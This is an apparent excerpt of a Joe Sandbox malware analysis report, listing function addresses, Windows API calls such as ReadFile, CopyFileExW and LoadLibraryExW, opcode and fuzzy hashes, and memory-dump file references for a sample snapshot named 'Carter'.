                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                        • Instruction ID: 8f45dc280af4bf6f389090d16f6a67b4c7ef47156437162529ffb803992f2961
                                                                        • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                        • Instruction Fuzzy Hash: 0C31C275604607DFD725DF18D440A31F7A0FF48360B18C56DEA8A8B7A4D730E881EB94
                                                                        Function 00FF410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00FF41B2
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: a13e6ca02e9b93a5dd93667494e99d6379f40ca9f885e8e46b40bd554d88ff7e
                                                                        • Instruction ID: f8097c56362a5cd156ed9555b43fd57aa9e2ec5712b5662c68c40a183811309b
                                                                        • Opcode Fuzzy Hash: a13e6ca02e9b93a5dd93667494e99d6379f40ca9f885e8e46b40bd554d88ff7e
                                                                        • Instruction Fuzzy Hash: B1318371A00619AFDB19CF2CC8806AEB7B5FF58320F148629E91593724D770BD90DB90
                                                                        Function 0101E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 8c1b3106099b58f3f632b755b5261199fe6db5bedc17a0a95eecacf186d021fb
                                                                        • Instruction ID: 27c8739940ed9a4d7e63b79bbd286f0c6792662cb6febf6e0c8ebc156e30c108
                                                                        • Opcode Fuzzy Hash: 8c1b3106099b58f3f632b755b5261199fe6db5bedc17a0a95eecacf186d021fb
                                                                        • Instruction Fuzzy Hash: DE415974908385CFDB25CF15C488B1ABBE1BF55358F0988ACF8898B362C376E845DB52
                                                                        Function 00FF49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00FF4B63
                                                                          • Part of subcall function 0100547B: __wfsopen.LIBCMT ref: 01005486
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FF27AF,?,00000001), ref: 00FF49F4
                                                                          • Part of subcall function 00FF4ADE: FreeLibrary.KERNEL32(00000000), ref: 00FF4B18
                                                                          • Part of subcall function 00FF48B0: _memmove.LIBCMT ref: 00FF48FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                        • String ID:
                                                                        • API String ID: 1396898556-0
                                                                        • Opcode ID: 129af18f4b615d8ce8c102dd6866fe810b93e798e4c1570324bba3ef8e01b69f
                                                                        • Instruction ID: 640d8bf1e96d6a22ef2464bdb2df1b067f64d31889de5672c283370888549b41
                                                                        • Opcode Fuzzy Hash: 129af18f4b615d8ce8c102dd6866fe810b93e798e4c1570324bba3ef8e01b69f
                                                                        • Instruction Fuzzy Hash: 3A11C43265020DABDB10EF748C02FBF76A99F44701F10442DF681A61A1EABDAA11B794
                                                                        Function 00FF1BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: ed768318928ad9db74eb72ab79bc14ac0b3ac671dc733207cff94445e1afad0c
                                                                        • Instruction ID: 00bbf30ff81dcbb6d83faf5e4a2329f9158aec438412b291d65603e745cde3ab
                                                                        • Opcode Fuzzy Hash: ed768318928ad9db74eb72ab79bc14ac0b3ac671dc733207cff94445e1afad0c
                                                                        • Instruction Fuzzy Hash: 04114976604605DFD724CF28D480A66B7E9FF49364B20882EE98ACB761E732E841DF50
                                                                        Function 0101E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 1876e451b94bd7ef1652a70f1083e56d360e28a68fbb063467235872764829a1
                                                                        • Instruction ID: 6be29546166c09ce5fe548d0a628b84a26cfc5e0eb1c08f8916446db6fd741ef
                                                                        • Opcode Fuzzy Hash: 1876e451b94bd7ef1652a70f1083e56d360e28a68fbb063467235872764829a1
                                                                        • Instruction Fuzzy Hash: EC2130B4A08385CFDB25CF14C444B1ABBE1BF98304F05896CF98A97361C735E809DBA2
                                                                        Function 00FF4220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00FF3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FF4276
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: e980f44e4e53e9e82ae2c9207e00800cacb6d587167f88a3cdce94694afc0fce
                                                                        • Instruction ID: 3788e01cbb088adaf37e4ec6c562b31e76f25f2af32de4ed65c69efc3b9d0f7b
                                                                        • Opcode Fuzzy Hash: e980f44e4e53e9e82ae2c9207e00800cacb6d587167f88a3cdce94694afc0fce
                                                                        • Instruction Fuzzy Hash: 501128316007059FD320CF55D480B63B7E5FF88720F10892DEAAA86A60D7B1F945AB60
                                                                        Function 00FF1A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                        • Instruction ID: 3de6a50be525063a7d75499be40fcb0fa2afb67259af6ca2a94d250b7d23a4ff
                                                                        • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                        • Instruction Fuzzy Hash: 27012672600706AED3215F38C801BB7BB98EF447A0F10852EF65ACA1E0EA31E4409790
                                                                        Function 0105495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 01054998
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentVariable
                                                                        • String ID:
                                                                        • API String ID: 1431749950-0
                                                                        • Opcode ID: 0db2d7af0eae34b6e269990c3f7066fca9ae81856939effc821e3d2717366284
                                                                        • Instruction ID: 018fd488b6c0a5eba42656fa9e91f98d8b1b3d7be28b5ef50493fe4d5342839f
                                                                        • Opcode Fuzzy Hash: 0db2d7af0eae34b6e269990c3f7066fca9ae81856939effc821e3d2717366284
                                                                        • Instruction Fuzzy Hash: F1F08135608209AFDB11EB65D845CAF77BCEF55320B000059F848DB2A0EE70F941DB50
                                                                        Function 01047C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • _memset.LIBCMT ref: 01047CB4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 525207782-0
                                                                        • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                        • Instruction ID: 0f3015e0a8d7f791d6d030b12b07c3cbcac7c3c651d3b64e194348a31f6f7b1d
                                                                        • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                        • Instruction Fuzzy Hash: D501F6742042059FE322EF5CD941F59BBE1AF69350F2484AEF5C88B3A1DB72E840DB95
                                                                        Function 0101DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • _memmove.LIBCMT ref: 0101DC8B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1602317333-0
                                                                        • Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                        • Instruction ID: 253adef2935cebc81f1077d70d313e105d8ac9e59226d13bb1676593bf207e46
                                                                        • Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
                                                                        • Instruction Fuzzy Hash: 1DF0F974604142DFE715DF68C980F25BBE1BF2A344F24849CE1C98B3A1E772E811DB91
                                                                        Function 00FF4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _fseek
                                                                        • String ID:
                                                                        • API String ID: 2937370855-0
                                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                        • Instruction ID: fcb7c0ff8ced4ceed7620f096f0d10ec4360722ef451983c34f327bc1ae77bb5
                                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                        • Instruction Fuzzy Hash: 84F085B6500208FFDF118F84DC00DEBBBBDEF89320F044498F9045A220D232EA219BB0
                                                                        Function 00FF4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,00FF27AF,?,00000001), ref: 00FF4A63
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 84d2665bdfdd4eea5296a3a5ca1fc32705e72d175596068bec8d0b77246d3d92
                                                                        • Instruction ID: 6d451bb93a23ba0b4e059ec0bf55151f1ee0d4abc068663e7723cf5a28a6655f
                                                                        • Opcode Fuzzy Hash: 84d2665bdfdd4eea5296a3a5ca1fc32705e72d175596068bec8d0b77246d3d92
                                                                        • Instruction Fuzzy Hash: 06F01C71545705CFCB349F64E490827BBF0AF14325320892EE2D683630C736A944EF44
                                                                        Function 00FF4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock
                                                                        • String ID:
                                                                        • API String ID: 2638373210-0
                                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                        • Instruction ID: 6922973fda71ba47983d73132139204ec69e280a04e30b70880baf16e10a3c1e
                                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                        • Instruction Fuzzy Hash: A3F0587240020DFFDF05CF80C941EAABB79FF04314F208189FD188A251D336EA21AB90
                                                                        Function 010009C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 010009E4
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath_memmove
                                                                        • String ID:
                                                                        • API String ID: 2514874351-0
                                                                        • Opcode ID: be6d111988d99ea6fc3a2b6d830bfd501136529fa65b95648960da791c59983e
                                                                        • Instruction ID: 7911f9862b796748c90ac5fb3bb4677ea27eda444aa3186904038d3904f4caa6
                                                                        • Opcode Fuzzy Hash: be6d111988d99ea6fc3a2b6d830bfd501136529fa65b95648960da791c59983e
                                                                        • Instruction Fuzzy Hash: D0E0863690012857C72195A89C05FEA77DDEF89690F0442B6FD4CD7248D9659C818691
                                                                        Function 01044D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 01044D31
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FolderPath_memmove
                                                                        • String ID:
                                                                        • API String ID: 3334745507-0
                                                                        • Opcode ID: a507561d1476625aa0baa141efe36f52bdeab67a17a52124b0a9eaced6121088
                                                                        • Instruction ID: 3eaabff365f20dbc41c92247fd5bc21735bd7b816c8182601dcf6af831370a9e
                                                                        • Opcode Fuzzy Hash: a507561d1476625aa0baa141efe36f52bdeab67a17a52124b0a9eaced6121088
                                                                        • Instruction Fuzzy Hash: 5DD05EB190032C6BDB60E6A49C0DDB77BACEB44220F0007A17C9CD3105ED689D4586E0
                                                                        Function 0104394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0104384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,01043959,00000000,00000000,?,010305DB,01098070,00000002,?,?), ref: 010438CA
                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,010305DB,01098070,00000002,?,?,?,00000000), ref: 01043967
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: File$PointerWrite
                                                                        • String ID:
                                                                        • API String ID: 539440098-0
                                                                        • Opcode ID: e4ca15379b35fea41f5781f0ff1df65ae879152077ed3cbc9dfa9080904e9fa7
                                                                        • Instruction ID: fa0e4a173aaee6e9942aca1f87ca61820bce0f40c5b379e6bd487cb90490b92c
                                                                        • Opcode Fuzzy Hash: e4ca15379b35fea41f5781f0ff1df65ae879152077ed3cbc9dfa9080904e9fa7
                                                                        • Instruction Fuzzy Hash: F1E04F35400218BBD720AF94D800ADAB7BCEB15310F00465AFD4095101D7B29E149BD0
                                                                        Function 01043EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,01043E7D,?,?,?), ref: 01043F0D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CopyFile
                                                                        • String ID:
                                                                        • API String ID: 1304948518-0
